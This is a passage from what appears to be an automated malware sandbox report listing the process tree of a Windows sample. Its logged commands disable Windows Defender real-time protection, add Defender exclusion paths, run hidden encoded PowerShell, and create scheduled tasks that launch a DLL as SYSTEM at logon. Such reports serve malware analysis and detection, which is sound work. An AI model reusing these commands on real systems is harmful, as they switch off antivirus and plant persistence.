    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2824
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2772
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2548
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gsvEZDDNH" /SC once /ST 00:32:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2156
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gsvEZDDNH"
  2⤵
  PID:2388
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gsvEZDDNH"
  2⤵
  PID:2168
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2212
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3044
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gbkhmxIiD" /SC once /ST 05:38:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1668
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gbkhmxIiD"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2044
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gbkhmxIiD"
  2⤵
  PID:3048
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
  2⤵
  - Indirect Command Execution
  - System Location Discovery: System Language Discovery
  PID:1812
- - C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
    3⤵
    PID:1560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1956
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:32
  2⤵
  - System Location Discovery: System Language Discovery
  PID:932
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2316
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:2976
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2092
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1724
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /C copy nul "C:\Windows\Temp\pqEZrWlsHvsjYwEL\VnnBMNVw\atZvUuDFuHcyDOUS.wsf"
  2⤵
  PID:3064
- C:\Windows\SysWOW64\wscript.exe
  wscript "C:\Windows\Temp\pqEZrWlsHvsjYwEL\VnnBMNVw\atZvUuDFuHcyDOUS.wsf"
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PBESNRhdmYKU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PBESNRhdmYKU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fJZgEdoSEgzXC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fJZgEdoSEgzXC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jAmSRiPKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jAmSRiPKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YpcryChfqZNPHIVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:2364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YpcryChfqZNPHIVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:1704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    - System Location Discovery: System Language Discovery
    PID:400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OkFXZwGHSaUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PBESNRhdmYKU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PBESNRhdmYKU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fJZgEdoSEgzXC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fJZgEdoSEgzXC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jAmSRiPKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jAmSRiPKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YpcryChfqZNPHIVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\YpcryChfqZNPHIVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\pqEZrWlsHvsjYwEL" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1360
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gWbyEFhWs" /SC once /ST 05:33:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gWbyEFhWs"
  2⤵
  PID:2484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gWbyEFhWs"
  2⤵
  PID:2652
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2668
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2852
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:3008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QktyAJLtVnYfSxJhB"
  2⤵
  PID:3060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QktyAJLtVnYfSxJhB"
  2⤵
  PID:2636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QktyAJLtVnYfSxJhB2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2376
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QktyAJLtVnYfSxJhB2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UcvpdSaxZqteAEHLP"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UcvpdSaxZqteAEHLP"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UcvpdSaxZqteAEHLP2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UcvpdSaxZqteAEHLP2"
  2⤵
  PID:2800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UNaLOeXwuufOskHYRqU"
  2⤵
  PID:1728
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UNaLOeXwuufOskHYRqU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "UNaLOeXwuufOskHYRqU2"
  2⤵
  PID:1716
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "UNaLOeXwuufOskHYRqU2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1936
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wMgwruRDwNqKnANvEdh"
  2⤵
  PID:752
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wMgwruRDwNqKnANvEdh"
  2⤵
  PID:1684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wMgwruRDwNqKnANvEdh2"
  2⤵
  PID:780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wMgwruRDwNqKnANvEdh2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1504
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jAmSRiPKU\GTUFio.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HxvKEihgfuYdkMf" /V1 /F
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uRXuSJQXCpgnIZA"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2548
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uRXuSJQXCpgnIZA"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uRXuSJQXCpgnIZA2"
  2⤵
  PID:2212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uRXuSJQXCpgnIZA2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "WvtRwCkDwELrRc"
  2⤵
  PID:2168
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "WvtRwCkDwELrRc"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "zgNliGDdKMNiC"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zgNliGDdKMNiC"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "zgNliGDdKMNiC2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "zgNliGDdKMNiC2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2400
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HxvKEihgfuYdkMf2" /F /xml "C:\Program Files (x86)\jAmSRiPKU\RrtsBSE.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:400
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "HxvKEihgfuYdkMf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2032
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "HxvKEihgfuYdkMf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2848
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zSXJNzYNKIeBJp" /F /xml "C:\Program Files (x86)\PBESNRhdmYKU2\fhLBsWe.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1532
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pXVGQcITqaeiH2" /F /xml "C:\ProgramData\YpcryChfqZNPHIVB\UqGYZcd.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "UcvpdSaxZqteAEHLP2" /F /xml "C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\aSNrPhV.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wMgwruRDwNqKnANvEdh2" /F /xml "C:\Program Files (x86)\fJZgEdoSEgzXC\vzOloNF.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:2332
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 268
  2⤵
  - Program crash
  PID:3032

C:\Windows\system32\taskeng.exe
taskeng.exe {752C210B-C6FF-4AAA-9DEC-390093EEB955} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
1⤵
PID:1484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:780
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
